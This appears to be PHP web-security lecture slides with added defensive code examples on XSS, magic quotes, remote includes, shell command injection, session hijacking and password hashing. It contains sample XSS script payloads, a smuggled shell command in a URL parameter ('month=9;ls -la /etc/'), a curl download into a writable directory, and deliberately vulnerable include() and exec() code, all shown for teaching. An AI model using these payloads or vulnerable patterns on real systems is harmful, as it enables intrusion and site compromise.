Post on 21-Dec-2015
Security Issues
General Considerations
Security is a hot topic
Security discussions are full of jargon: Zero Day Exploit, Pen testing, Hacker, Pharming, Injection, malware, DOS
Serious issue, but lots of FUD
Start by thinking about where you are exposed
Filesystem
Multiuser systems
PHP code executes as the web server, with the web server's permissions
This means any file that you write via PHP might be writable by other users (either via PHP or a CGI program)
Any file that's readable by the web server is readable by others via the web server, even if the server won't serve them to a browser directly
Often web pages are world readable
Forms
You're also exposed whenever you request data from a user
A user may give you data you don't expect or want
Depending on how your program handles the data, this can have a variety of results
Your data on the server could be affected
Other users' browsers could be affected
Other Vectors
This is an aside….
Services such as ssh and mysql
Firewalls
DMZ
Bind to different ip addresses
What you do from the server
Where the server is located--physical security is key
Consider where you want to put your security measures
For example, in this class I'm trusting you all a lot, as a group, not to trash machines
In MySQL, you can either use the database to secure data, or PHP, or both
Both is hard to do…
In some cases, restricting access to a domain is enough, in others ids are better
Balance
Security is like a seesaw, with whitehats and blackhats on the ends
What's the most secure OS?
Where is the threat coming from these days?
Categories of Hacks
Data that is inserted into code that is displayed on your pages
Data that is inserted to alter your data
Holes that can be exploited to run arbitrary commands
Display Hacks
Targets are bulletin boards, blogs that allow comments, wikis, web forums--anything that allows users to input text that will be displayed
At best, you might get random stuff showing up on your web pages
At worst, users could be "captured" and whisked away
Builtin Security
PHP does try to protect us, but sometimes that protection causes its own problems
I'm going to run through a series of examples, showing some simple insertion techniques, and the approaches to stop them
Magic Quotes
An example of trying to do good in a bad way….
In the Beginning
As PHP became more popular, attacks against it became more common (why would this be the case?)
Around PHP 3, it was in widespread use, but had very few security features out of the box
In particular, it did nothing to affect data input by forms
Version 4.2.3
To make PHP safer, version 4.2.3 included magic quotes enabled by default
Magic quotes performs the same function as addslashes(), but only on GET, POST or cookie data--that is, it escapes any ', ", \, or NULL characters, in an attempt to prevent folks from inserting command strings into php
It works ok, for what it's trying to do, but isn't a complete solution…
So how does it work?
Magic quotes will try to protect us a bit if someone inserts something like:
<b>Alert!</b><p>Your account has been compromised, please <a href="http://www.cs.unc.edu">click here for further information</a></p>
echo_string_noslash.php
This file defeats magic quotes and echoes the $_GET["string"] var without alteration
<b>Alert!</b><p>Your account has been compromised, please <a href="http://www.cs.unc.edu">click here for further information</a></p>
Calgon, take me away
One can also insert code that moves the user from your site:
<script type=text/javascript>window.location = "http://www.duke.edu";</script>
With magic quotes
echo_string.php doesn't defeat magic quotes
<b>Alert!</b><p>Your account has been compromised, please <a href=http://www.cs.unc.edu>click here for further information</a></p>
Can't trust browsers anyhow
So with magic quotes if the hacker uses well formed HTML, we're ok
But what if I put this in:
Or this: <img src=http://cutedeadthings.com/images/skull-pink-tm.png>
The browser is trying to be helpful…
Look at the source
We don't need no quotes
Even worse, we don't need quotes to call for an external javascript
This means we can insert pretty much anything we want into the page:
<script src=http://127.0.0.1/INLS672/samples/php/security/javascript_hack.js></script>
This last example
Cross site scripting (XSS) generally involves getting data into a web form that produces HTML for display, and using that to call an external script to perform a malicious action
This is often done with javascript, but can be done with other languages
Older versions of IE were prone to attack in this manner because of ActiveX
Are Magic Quotes AGT?
Some say that magic quotes are bad
When enabled, it can make it more difficult to get the data the way you want it
Produces a false sense of security, since programmers should check user data anyway
But it does protect against the most common attacks such as insertion of javascript
But folks hated it enough that it's off in PHP 6
And that's the worst of it--if you want to write portable code, you have to check for it
Detecting and Defeating Magic Quotes
This is not very efficient:
<?php
if (get_magic_quotes_gpc()) {
    // Undo the escaping that magic quotes applied, recursing into nested arrays
    function stripslashes_deep($value) {
        $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value);
        return $value;
    }
    $_POST = array_map('stripslashes_deep', $_POST);
    $_GET = array_map('stripslashes_deep', $_GET);
    $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
    $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
?>
from http://us.php.net/manual/en/function.stripslashes.php
It's up to you
For many samples of XSS attacks, see: http://ha.ckers.org/xss.html
Simple Sanitation
In this case, we're going to use htmlentities(), htmlspecialchars() and strip_tags() to affect the user's input
see echo_string_checks.html
Be aware that this is mainly a browser protection…
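As an added example (not one of the class sample files), the following script runs the slide inputs through addslashes() (what magic quotes did), htmlspecialchars() and strip_tags() side by side, so you can see that the unquoted script tag survives magic quotes untouched while output encoding makes every sample inert; the sample inputs are constructed for this run.

```php
<?php
// Added example, not code from the slides: what addslashes() (the magic quotes
// behaviour) leaves alive, next to output encoding with htmlspecialchars() and
// tag removal with strip_tags(). Run from the command line: php echo_string_compare.php

// Constructed sample inputs, modelled on the slide examples.
$samples = [
    'quoted'   => '<b>Alert!</b><p>Your account has been compromised, please <a href="http://www.cs.unc.edu">click here</a></p>',
    'unquoted' => '<script src=http://127.0.0.1/INLS672/samples/php/security/javascript_hack.js></script>',
    'plain'    => "O'Reilly & Sons <3",
];

// Roughly what echo_string.php saw under magic_quotes_gpc: quote characters get
// a backslash, angle brackets are untouched, so the tags still parse.
function render_with_magic_quotes(string $input): string
{
    return addslashes($input);
}

// Output encoding: every character with meaning in HTML becomes an entity, so
// the browser displays the text instead of parsing it. ENT_QUOTES also covers
// single quotes inside attributes; the charset must match the page's.
function render_escaped(string $input): string
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// strip_tags() is the blacklist approach: it removes what looks like a tag and
// keeps the text. Good enough for plain comments, not for preserving markup.
function render_stripped(string $input): string
{
    return strip_tags($input);
}

// Rough check of whether a rendered string still contains a tag the browser
// would act on; used only to label the output below.
function still_contains_markup(string $rendered): bool
{
    return (bool) preg_match('/<\s*(script|img|a|b|p)\b/i', $rendered);
}

$renderers = [
    'magic quotes'     => 'render_with_magic_quotes',
    'htmlspecialchars' => 'render_escaped',
    'strip_tags'       => 'render_stripped',
];
foreach ($samples as $name => $input) {
    echo "== $name ==\n";
    foreach ($renderers as $label => $fn) {
        $out = $fn($input);
        printf("%-17s %-5s %s\n", $label, still_contains_markup($out) ? 'LIVE' : 'inert', $out);
    }
}
```

Both the quoted and the unquoted sample come out LIVE under addslashes(), which is the browser-is-helpful problem from the slides; only the encoded and stripped versions are inert.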
Blacklist vs. Whitelist
What we've looked at so far are examples of blacklisting--trying to spot evil input
Whitelisting is more secure--figure out what you want, and only allow that
Using regex
Decide what you're willing to accept
Check the user input for that
// Only letters and digits (zero or more) are accepted; eregi() was removed in PHP 7, so preg_match() is used here
if (preg_match('/^[a-zA-Z0-9]*$/', $_GET['string'])) {
    echo "String is: " . $_GET['string'];
} else {
    echo "<p>Illegal characters detected</p>";
}
echo_string_clean.html
This is the same form, but passes data to a php script with the regex code
This approach has advantages
Futureproof
Doesn't require you to guess what the hacker might try
On error, doesn't process the data at all
Downside is it's harder to get data through
Arbitrary Commands
Basically, this is the worst kind of attack
Cracker finds a hole that allows a command to be executed
Most often that happens at the privilege level of the web server
In some cases, it can be an elevated privilege (rare on linux, not so rare on windows under pre-vista installations)
Includes and Requires
It's pretty common to use an include or require to pull files into a core script
This is a potential vector for an XSS attack, since PHP doesn't care if the file included is remote or local
Be careful with these--if you pass the file to be included into your script with a GET or POST, a hacker can run a script of their own through yours
magic_quotes do not protect against this
It's one of the ways I've been hacked
include $_GET['file'];
How I've Been Hacked
I created a simple PHP file that included other files with a GET reference
This allowed me to call files elsewhere on the server inside my frame program, and control the display if the file were a text file or html
I did not check the data being passed
The hacker passed a reference to a file on their system, that ran a perl script creating an email relay on our web server, and then passed email through the web server to our smtp server, which accepted all of the spam, since it came from within cs.unc.edu
The File
http://wwwx.cs.unc.edu/help/network/frame.php?
The problem line was: include($_GET[name]);
The Fix
Changed include() to readfile(), the latter doesn't process code, just reads it to output
Added a check for "//" for remote access urls
Added a hook to send email to me when tapped
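An added example, not the frame.php code itself, of how the fix above can be carried further: the request selects a fragment by name, the resolved path is confined to one directory (a "//" check alone stops remote URLs but not local "../" paths), and the file is emitted with readfile(). The fragments directory and the fragment names are assumptions.

```php
<?php
// Added example, not the frame.php code from the slides: a replacement for
// include($_GET['name']) that selects a local fragment by name and confines the
// resolved path to one directory before readfile(). A "//" check alone catches
// remote URLs but not local paths containing "../", so the check here is made on
// the resolved path. Directory and fragment names are assumptions.

const FRAGMENT_DIR = __DIR__ . '/fragments';   // assumed location of the displayable text/html files

// Explicit allow-list: when the set of pages is known, the request selects a
// key and never a path.
const ALLOWED_FRAGMENTS = [
    'about'   => 'about.html',
    'contact' => 'contact.html',
    'help'    => 'help.txt',
];

// For an open-ended set of files: validate the name and confine the resolved
// path. realpath() collapses "../" and symlinks, so the prefix test is made on
// where the file really is, not on the string the client sent.
function resolve_fragment_path(string $name): ?string
{
    // Rejects URL schemes ("http://", "php://", "data:"), directory separators
    // and anything but a simple file name with an expected extension.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(html|txt)\z/', $name)) {
        return null;
    }
    $base = realpath(FRAGMENT_DIR);
    $path = realpath(FRAGMENT_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;                                  // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                                  // resolved outside the fragment directory
    }
    return $path;
}

// Emit the file as data. readfile() (the fix described in the slides) never
// executes PHP inside the file, and a .txt file is sent as text/plain so the
// browser does not interpret its contents as HTML.
function emit_fragment(string $requested): bool
{
    $name = ALLOWED_FRAGMENTS[$requested] ?? $requested;
    $path = resolve_fragment_path($name);
    if ($path === null) {
        header('HTTP/1.1 404 Not Found');
        error_log('frame: rejected fragment request ' . var_export($requested, true));
        return false;
    }
    $type = substr($path, -4) === '.txt' ? 'text/plain' : 'text/html';
    header('Content-Type: ' . $type . '; charset=UTF-8');
    readfile($path);
    return true;
}

emit_fragment($_GET['name'] ?? '');
```

The error_log() call is the place for the "send email to me when tapped" hook; logging the rejected value with var_export() keeps newlines and quotes visible in the log.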
Attacking the server
Since PHP can pull data about the server, it can be used to find out about the server's configuration (esp. the web server)
More dangerous is the ability to access the shell
You should be careful with any data that will be passed to a shell script with back ticks, exec(), or shell_exec()
Unguarded GET or POST
In this case, the GET variable is passed directly into a shell exec
We know that shell script lines are terminated in a ";"
So a command can be passed in the variable, by inserting a semicolon
This example from http://www.sitepoint.com/article/php-security-blunders
$month = $_GET['month'];
$year = $_GET['year'];
exec("cal $month $year", $result);   // unchecked input goes straight into the command line
print "<PRE>";
foreach ($result as $r) { print "$r<BR>"; }
print "</PRE>";
Unguarded GET or POST
An example of a get URL: http://127.0.0.1/php/security/unguarded_get.php?month=9;ls -la /etc/
This would be passed to the web server, and executed with its permissions, so it's a better vector for reads than writes
But any directory that the web server could write to could be tapped….
This example from http://www.sitepoint.com/article/php-security-blunders
Unguarded GET or POST
Ok, so let's say this file sits in a directory that the web server can write to (say for a user comment file, or a log, or….)
Then a hacker could pass something more malicious, eg: curl http://www.cs.unc.edu -o myfile.php
Unguarded GET or POST
The author recommends using a regular expression to check that the input is solely numbers, and of the correct length
This example from http://www.sitepoint.com/article/php-security-blunders
$month = $_GET['month'];
$year = $_GET['year'];
if (!preg_match("/^[0-9]{1,2}$/", $month)) { die("Bad month, please re-enter."); }
if (!preg_match("/^[0-9]{4}$/", $year)) { die("Bad year, please re-enter."); }
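An added example (not the SitePoint code) that carries the whitelist idea from the regex slides and the month/year check through to the exec() call: the patterns are anchored with \A and \z, because "$" in PCRE also matches just before a trailing newline, and the validated values are still wrapped with escapeshellarg() before they reach the shell. The test inputs at the bottom are constructed.

```php
<?php
// Added example, not the SitePoint code from the slides: the month/year check
// carried through to a safe exec() call. Two things are added to the slide's
// version: \A...\z anchoring (a "$" anchor still accepts "9\n") and
// escapeshellarg() on the values even though they already passed validation.

function valid_month(string $month): bool
{
    // One or two digits, in range, and nothing else (no trailing newline).
    return (bool) preg_match('/\A[0-9]{1,2}\z/', $month) && (int) $month >= 1 && (int) $month <= 12;
}

function valid_year(string $year): bool
{
    return (bool) preg_match('/\A[0-9]{4}\z/', $year);
}

// Build the command line only from values that passed validation, and quote
// them anyway so a later loosening of the pattern cannot reintroduce shell
// metacharacters.
function build_cal_command(string $month, string $year): ?string
{
    if (!valid_month($month) || !valid_year($year)) {
        return null;
    }
    return 'cal ' . escapeshellarg($month) . ' ' . escapeshellarg($year);
}

// Render the calendar, HTML-encoding the program output as well: exec() output
// is data too, even when it comes from a trusted program.
function render_calendar(string $month, string $year): string
{
    $cmd = build_cal_command($month, $year);
    if ($cmd === null) {
        return '<p>Bad month or year, please re-enter.</p>';
    }
    exec($cmd, $lines, $status);
    if ($status !== 0) {
        return '<p>Could not produce a calendar.</p>';
    }
    return '<pre>' . htmlspecialchars(implode("\n", $lines), ENT_QUOTES, 'UTF-8') . '</pre>';
}

// Constructed inputs for a command-line run: php cal_guarded.php
$tests = [
    ['9', '2015'],               // accepted
    ['9;ls -la /etc/', '2015'],  // the slide's example input: rejected by the pattern
    ["9\n", '2015'],             // passes /^[0-9]{1,2}$/ but not the \A...\z version
    ['13', '2015'],              // rejected by the range check
];
foreach ($tests as [$m, $y]) {
    printf("%-22s -> %s\n", json_encode($m), build_cal_command($m, $y) ?? 'rejected');
}
```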
06_mysql_submit.php
I'm pretty much a failure hacking MySQL so far…
But using the lab as an example, here are some things you can insert into the db:
<a href=\"http://www.cs.unc.edu\">Wonk</a>
<img src=/PoweredByMacOSXLarge.gif>
It's restricted by the number of characters allowed in the field, but you get the idea
Additional Considerations for MySQL
Don't use unrestricted privileges for database connections (do as I say, not as I do)
Either have the user supply a user id and password, or use a restricted account
Use a mysql account that is limited and appropriate for the given task
General Server Settings
register_globals
register_globals, when on, allows php full access to all variables directly
In my examples, I've accessed GET and POST data via the server global array even when not necessary
With it on, $_GET["variable"] is the same as $variable in php
This gives a hacker a chance to inject data into unprotected variables in your script, say into a session variable
So check to see that it's off
open_basedir
The default is to allow php to open any files; this setting can be enabled to restrict what directories php can access
With a setting of ".", the tree is restricted to the folder of the script itself, or lower
Can be set for virtual servers in apache
Keep in mind that this setting only affects php; any shell scripts you use have full run of the directory tree
What can you do?
(Panic?)
Protect your code
In the class pages, I've made the source code visible over the web
This is something to avoid in general--it's easier to hack a site if you know the source
Hide configuration files and data
Restrictive .htaccess files
Use cron based shell scripts to whisk data away
Keep data and config files separate from scripts
Use a sealed db server
Hiding files
Files with a "." as the first character are readable by PHP, but won't be served by a web server
Depending on the server configuration (such as the web server's FollowSymLinks setting, or PHP's open_basedir setting), you may be able to store data files in areas that the web server won't serve up
.htaccess files
Disallow directory listings
You can also use a blank index file
Restrict access by user id or by domain
See http://www.htaccessbasics.com/
Directory Structures
Keep data files in one directory, configuration files in another, and scripts in a third
You may need to put the data and config dirs inside the scripts folder, but you can use an .htaccess file or other methods to control access
For example, write permissions or afs acls
Open versus Sealed servers
Be aware of who else is on your server
Remember that the web server has to have read privileges--if I'm on the same server, I might be able to use a cgi to see your source code
Consider a "sealed" server for critical data
Finding Hacks
Run a hash on your scripts to check for mods--there are lots of freebie programs that can do this for you and alert you to changes
Tripwire is one example, but it's a complicated thing
Watcher
Keep Cookies in the jar
PHP sessions can store data in cookies as well as server side--best not to do this unless the data's not sensitive
Keep Cookies in the jar
Some browsers (ie for example) have historically been prone to cookie theft
So if you store sensitive data in a cookie, salt and encrypt it (hash is always better with salt anyway)
Control Session Data
In the examples for class, I've used a session to store data across forms
Session data is usually in /tmp or /var/tmp
Since the web server can read these, so can anyone else on the server who can write web scripts
Protecting Session Data
To reduce the chance of hijacking, use a combination of data--for example, check not only the session key, but also the ip number (consider storing that in post data or a text file)
Encrypt any sensitive data stored in the session
cookie_monster.php
Better Still
Generate a random key on each page load
Check other data, such as the client ip number or browser version, and track that as well
Store data in multiple places and compare (eg. some data in the session, some in a cookie, and even some in a database or file)
```
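An added example (not cookie_monster.php) of the three measures above in one script: the session is tied to a hash of the client address and browser string, a fresh random token is issued on each page load and must come back with the next form post, and a mismatch ends the session. It assumes the credential check happens elsewhere and that the form carries the token in a hidden field named page_token.

```php
<?php
// Added example, not cookie_monster.php from the slides: tying a PHP session to
// the client details the slides mention (address and browser) and issuing a
// fresh token per page load. Assumes the credential check happens elsewhere;
// the token travels in a hidden form field named page_token.

session_start();

// Hash of the values tracked alongside the session id. Storing the hash rather
// than the raw values keeps them out of the session file in /tmp.
function client_fingerprint(): string
{
    return hash('sha256', ($_SERVER['REMOTE_ADDR'] ?? '') . '|' . ($_SERVER['HTTP_USER_AGENT'] ?? ''));
}

// The "random key on each page load": 128 bits from the CSPRNG.
function new_page_token(): string
{
    $_SESSION['page_token'] = bin2hex(random_bytes(16));
    return $_SESSION['page_token'];
}

// After a successful login: a new session id (so an id chosen before login is
// worthless) and the fingerprint to compare against later.
function establish_session(string $userid): void
{
    session_regenerate_id(true);
    $_SESSION['userid'] = $userid;
    $_SESSION['fingerprint'] = client_fingerprint();
    new_page_token();
}

// On every request: the session must exist and still look like the same client.
function session_fingerprint_ok(): bool
{
    if (!isset($_SESSION['userid'], $_SESSION['fingerprint'])) {
        return false;
    }
    if (!hash_equals($_SESSION['fingerprint'], client_fingerprint())) {
        session_unset();
        session_destroy();          // treat a mismatch as a hijack attempt and start over
        return false;
    }
    return true;
}

// On a form submission: the token issued with the form must come back unchanged.
function page_token_ok(?string $posted): bool
{
    if ($posted === null || !isset($_SESSION['page_token'])) {
        return false;
    }
    return hash_equals($_SESSION['page_token'], $posted);
}

if (!session_fingerprint_ok()) {
    die('<p>Please log in again.</p>');
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !page_token_ok($_POST['page_token'] ?? null)) {
    die('<p>Form token missing or stale, please resubmit.</p>');
}
// Issue the token for this page load; the form's hidden page_token field gets
// its value run through htmlspecialchars(). Each token is valid for one post.
$token = new_page_token();
```

Binding to the address breaks for users behind rotating proxies or on mobile networks; a common compromise is to bind to the browser string and treat an address change as a reason to ask for the password again rather than to destroy the session.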
Hash is good for you
I've mentioned this a few times, but you can use hashes of data as a security measure, esp. for passwords
What is hash really?
createLogin
This is some code I used for a faculty application site
Users created a login with their email address as an id
Passwords stored in a text file, as an MD5 hash
create_login.php
This is a simple php script that calls some HTML into itself, and uses a jah like function to test the data submitted by the user--this check has a php backend, so the javascript check and the subsequent php check are the same
All it does for the password is run it through md5
$new_entry['id'] = trim($_POST["get_id"]);
$new_entry['passwd'] = md5(trim($_POST["get_passwd"]));   // unsalted MD5 of the submitted password
$new_entry['key'] = $_SESSION['session_key'];
$new_entry['created'] = $runtime;
$new_entry['status'] = "new";
write_data_file($new_entry, $id_data);
create_login.php
As the form is submitted to itself, after some checks, the post data is shoved into an array, and written to a file
The hash would be better with a salt
submit_application.php
After the id is created, or when a user returns, they land on submit_application.php
This asks them for the userid and password on the first pass
On the second pass, it checks the userid and data in the post
$ids_file = read_data_file("./config/userids.txt");
$test = md5_match_array_element($ids_file, "id", $_POST["id"], "passwd", $_POST["passwd"]);
if ($test > 0) {
    $action = "submit_application: login_failure";
    require './logger.php'; // call the program to write out log entries.
    die_cleanly("<div id=\"notice\"><p>Invalid User ID or password, if you feel you have received this message in error please contact <a href=\"http://www.cs.unc.edu/cgi-bin/mailcs?hays\"> bil hays</a></p></div>");
}
submit_application.php
Notice md5_match_array_element()
md5_match_array_element()
// Returns "0" when the id is found and the MD5 of the submitted password matches,
// "1" when the id is found but the password does not match, "2" when the id is not found
function md5_match_array_element($array, $array_key, $get_key, $array_element, $get_element)
{
    foreach ($array as $i) {
        if ($i[$array_key] == $get_key) {
            if ($i[$array_element] != md5($get_element)) {
                return "1";
            }
            return "0";
        }
    }
    return "2";
}
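An added example, not the faculty-site code, of the salted version the slides say would be better: the same lookup and return codes as md5_match_array_element(), with the stored value produced by password_hash() (salt generated and embedded) and checked with password_verify(). The records and credentials at the bottom are constructed.

```php
<?php
// Added example, not the faculty-site code from the slides: the same lookup and
// return codes as md5_match_array_element(), but the stored value is a salted
// password_hash() string checked with password_verify(). The loose "!=" of the
// original is also avoided: PHP compares two numeric-looking strings as numbers,
// so any hash you keep should only be compared strictly or with hash_equals().

// What create_login.php would store instead of md5(trim($passwd)).
function make_login_record(string $id, string $passwd): array
{
    return [
        'id'     => $id,
        'passwd' => password_hash(trim($passwd), PASSWORD_DEFAULT),  // salt generated and embedded
        'status' => 'new',
    ];
}

// Same contract as the slides' function: "0" = id found and password matches,
// "1" = id found but password wrong, "2" = id not found.
function password_match_array_element(array $array, string $array_key, string $get_key,
                                      string $array_element, string $get_element): string
{
    foreach ($array as $i) {
        if (hash_equals((string) $i[$array_key], $get_key)) {
            return password_verify($get_element, $i[$array_element]) ? "0" : "1";
        }
    }
    return "2";
}

// Constructed records standing in for read_data_file("./config/userids.txt").
$ids = [
    make_login_record('alice@example.edu', 'correct horse'),
    make_login_record('bob@example.edu', 'battery staple'),
];

foreach ([['alice@example.edu', 'correct horse'],       // expected "0"
          ['alice@example.edu', 'wrong'],               // expected "1"
          ['nobody@example.edu', 'anything']] as [$id, $pw]) {  // expected "2"
    printf("%-20s %-15s => %s\n", $id, $pw, password_match_array_element($ids, 'id', $id, 'passwd', $pw));
}
```

Existing MD5 records can be migrated on the next successful login: verify against the old hash once, then overwrite the record with password_hash() of the password just presented.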
Use of hashes
A hash can be used to check a value presented against a prior value
Or to detect file changes--if you write a big chunk of code, you can run a hash on the files or the tarball. When you check the files against the hash, you can detect a change
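An added example, not one of the tools the slides mention, of the file-change idea from this slide and from Finding Hacks: a baseline of SHA-256 hashes over a script tree, and a check that reports modified, added and removed files so it can run from cron. The directory and baseline locations are assumptions; the baseline has to live where the web server cannot write, or whoever can change the scripts can update it too.

```php
<?php
// Added example, not a tool from the slides: a minimal "run a hash on your
// scripts" check. The script directory and the baseline file are assumptions;
// keep the baseline outside the web server's writable area.

function hash_tree(string $dir): array
{
    $hashes = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if ($file->isFile()) {
            $rel = substr($file->getPathname(), strlen($dir) + 1);   // path relative to $dir
            $hashes[$rel] = hash_file('sha256', $file->getPathname());
        }
    }
    ksort($hashes);
    return $hashes;
}

function write_baseline(string $dir, string $baseline): void
{
    file_put_contents($baseline, json_encode(hash_tree($dir), JSON_PRETTY_PRINT));
}

// Returns ['modified' => [...], 'added' => [...], 'removed' => [...]].
function compare_to_baseline(string $dir, string $baseline): array
{
    $old = json_decode((string) file_get_contents($baseline), true) ?: [];
    $new = hash_tree($dir);
    $report = ['modified' => [], 'added' => [], 'removed' => []];
    foreach ($new as $path => $hash) {
        if (!isset($old[$path])) {
            $report['added'][] = $path;
        } elseif (!hash_equals($old[$path], $hash)) {
            $report['modified'][] = $path;
        }
    }
    foreach (array_diff_key($old, $new) as $path => $_) {
        $report['removed'][] = $path;
    }
    return $report;
}

// Usage from cron: php check_scripts.php init   (once, after a known-good deploy)
//                  php check_scripts.php check  (exit status 1 when anything changed)
$dir      = __DIR__ . '/htdocs';                         // assumed script directory
$baseline = '/var/lib/script-hashes/baseline.json';      // assumed, outside the web tree
if (($argv[1] ?? '') === 'init') {
    write_baseline($dir, $baseline);
} else {
    $report = compare_to_baseline($dir, $baseline);
    foreach ($report as $kind => $files) {
        foreach ($files as $f) {
            echo strtoupper($kind), ": $f\n";
        }
    }
    exit(array_sum(array_map('count', $report)) ? 1 : 0);
}
```

A non-zero exit from cron is the cheapest "alert you to changes" hook; cron mails the job output to its owner by default.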
Final points
Keep Up To Date
Update your PHP installation regularly, and check the php.ini settings when you do
Create and check log files in your php programs (consider automating this with a cron)
Read--there are web sites and discussion lists that cover these issues--many are a bit histrionic, but you get good ideas anyway
http://nexodyne.com/
http://www.codehelp.co.uk/php/taint.php